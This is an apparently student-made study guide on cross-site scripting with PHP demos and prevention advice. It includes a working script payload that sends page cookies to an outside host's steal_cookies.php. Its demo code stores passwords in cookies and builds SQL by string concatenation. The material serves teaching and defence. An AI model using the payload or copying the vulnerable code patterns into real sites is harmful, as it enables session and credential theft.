Cross Site Scripting: Understanding and Preventing this Common Web Vulnerability, Study Guides, Projects, Research of Electrical and Electronics Engineering

Cross site scripting (XSS) is a type of cyber attack that allows an attacker to inject malicious code into a website, gaining unauthorized access to sensitive user data. This document explains how XSS works, its methods of delivery, and the harm it can cause. It also provides prevention measures such as output escaping, filtering, and input validation.

Typology: Study Guides, Projects, Research

2009/2010

Uploaded on 02/24/2010

koofers-user-qw7

XSS
Group 13
Andrew Kozlik, Ada

XSS - Overview

• What is Cross Site Scripting?
• Cross Site Scripting is a type of vulnerability found in web applications. When exploited, it allows an attacker to gain access to sensitive data.
• This access is gained by code injection. Code injection is when code is introduced into a program or application to change its course of execution.
• Note: Cross Site Scripting is sometimes abbreviated as CSS. This is not good practice, as it can lead to confusion with Cascading Style Sheets (also CSS), a technology used to add style to HTML documents. Instead, Cross Site Scripting should be abbreviated as XSS.

XSS – Overview

• According to the security software company Symantec, XSS has become the most common vulnerability on the web. In 2007, 11,253 site-specific cross-site vulnerabilities were documented, compared to 2,134 "traditional" vulnerabilities.
• Many prominent websites have been found to have XSS vulnerabilities, including Google, Facebook, and even FBI.gov. Once discovered, they are usually patched fairly quickly.

Prevention

• All web servers, application servers, and web application environments are susceptible to cross site scripting.
• It is likely that at least 68% of websites are open to XSS attacks on their users.
• Site administrators rarely fix XSS problems and, when they do, the average patch time is roughly 52 days.
• So how can we prevent this?

Prevention

• The answer is in fact simple: never trust user input and always filter metacharacters.
• The best way to find flaws is to perform a security review of the code and search for all places where input from an HTTP request could possibly make its way into the HTML output.
• Some methods include escaping, filtering, and input validation.

Prevention – Input Validation

• Input validation is a common theme in application development (even outside of web development) and is generally very useful.
• For instance, if a form accepts a field that is supposed to contain a phone number, a server-side routine could remove all characters other than digits, parentheses, and dashes, so that the result cannot contain a script.
• Input validation may help to mitigate other injection attacks such as SQL injection. While effective for most types of input, there are times when an application must be able to accept special HTML characters, such as '<' and '>'.

Demo

Sample Login Script

    <?php
    require("../includes/conn.php");
    session_start();

    // Credentials as submitted by the login form
    $user = $_POST['username'];
    $pass = $_POST['password'];

    // Look the user up (the demo builds the query by string concatenation)
    $sql = "select * from users where username = '$user' and password = '$pass'";
    $result = mysql_query($sql);

    if (mysql_num_rows($result) > 0) {
        // Both values are stored in cookies readable by scripts on the page
        setcookie("username", $user, time()+3600, "/");
        setcookie("password", $pass, time()+3600, "/");
        $_SESSION['logged'] = true;
        $_SESSION['username'] = $user;
        header("Location: ../comments.php");
        exit;
    } else {
        header("Location: ../index.php?error=1");
    }
    ?>

Note: We set two cookies holding the username and password.

Demo

Malicious user inputs the following code into the comments field:

    <script>
    window.location = "http://www.codefortravel.com/steal_cookies.php?cookie=" + document.cookie;
    </script>

Demo

• All of this can be avoided using simple data sanitization techniques.
• One such method is to convert HTML characters into their HTML entities.
    '<' would be converted to &lt;
    '>' would be converted to &gt;
    '&' would be converted to &amp;
• PHP has a function specifically made for this purpose. That function is htmlentities().

Demo

    <?php
    session_start();
    require("../includes/conn.php");

    $comment = $_POST['comment'];
    // Convert HTML metacharacters to entities before the comment is stored
    $comment = htmlentities($comment);

    // Legacy mysql_* API as in the original demo; values are concatenated into the SQL string
    $sql = "insert into comments (date, author, comment) values ('"
         . date('m-d-Y h:i A') . "', '" . $_SESSION['username'] . "', '$comment')";
    $result = mysql_query($sql);

    header("Location: ../comments.php");
    exit;
    ?>

This simple function is enough to protect against many XSS attacks, but it isn't perfect.

XSS References

• Demo created: http://ml.cecs.ucf.edu/andrew/xss/
• XSS Archive. Retrieved February 22, 2009, from XSS information and vulnerable websites archive Web site: http://www.xssed.com/archive/special=1
• Rafail, Jason (2001). Cross-Site Scripting Vulnerabilities. Retrieved February 22, 2009, from www.cert.org/archive/pdf/cross_site_scripting.pdf
• Cross-site scripting. In Wikipedia [Web]. Wikimedia Foundation, Inc. Retrieved February 22, 2009, from http://en.wikipedia.org/wiki/Cross-site_scripting
• (April, 2008). Trends for July–December 07. Symantec Internet Security Threat Report, XIII. Retrieved February 22, 2009, from http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_exec_summary_internet_security_threat_report_xiii_04-2008.en-us.pdf
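
A hardened variant of the demo's comment handler, added here as an example and not taken from the original slides: the comment is stored through a prepared statement and encoded when the page is rendered, for every field that reaches the HTML. It assumes PDO with the SQLite driver in place of conn.php and the mysql_* calls; the function names, the 2000-byte limit and the sample input are constructed for illustration.

```php
<?php
// Added example, not the authors' code: in-memory SQLite replaces conn.php.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE comments (date TEXT, author TEXT, comment TEXT)');

// Input validation: accept only non-empty, valid UTF-8 text up to an assumed
// 2000-byte limit. Markup characters are allowed; they are encoded on output.
function validate_comment(string $raw): ?string
{
    $raw = trim($raw);
    if ($raw === '' || strlen($raw) > 2000 || preg_match('//u', $raw) !== 1) {
        return null;
    }
    return $raw;
}

// Store the text as submitted; placeholders keep it out of the SQL syntax.
function save_comment(PDO $db, string $author, string $comment): void
{
    $stmt = $db->prepare(
        'INSERT INTO comments (date, author, comment) VALUES (?, ?, ?)'
    );
    $stmt->execute([date('m-d-Y h:i A'), $author, $comment]);
}

// Output escaping for HTML text and quoted attribute values.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Every database field is encoded at the point where it enters the HTML.
function render_comments(PDO $db): string
{
    $html = '';
    foreach ($db->query('SELECT date, author, comment FROM comments') as $row) {
        $html .= '<p><b>' . e($row['author']) . '</b> (' . e($row['date'])
               . '): ' . e($row['comment']) . "</p>\n";
    }
    return $html;
}

// Constructed sample input standing in for $_POST['comment'].
$submitted = "Nice post <script>alert(1)</script> & it's \"great\"";
$comment = validate_comment($submitted);
if ($comment !== null) {
    save_comment($db, 'alice', $comment);
}
echo render_comments($db);
```

The stored row keeps the original characters, so the same data can be encoded appropriately for whichever output context it is later written into; the rendered paragraph shows the script tag as inert text.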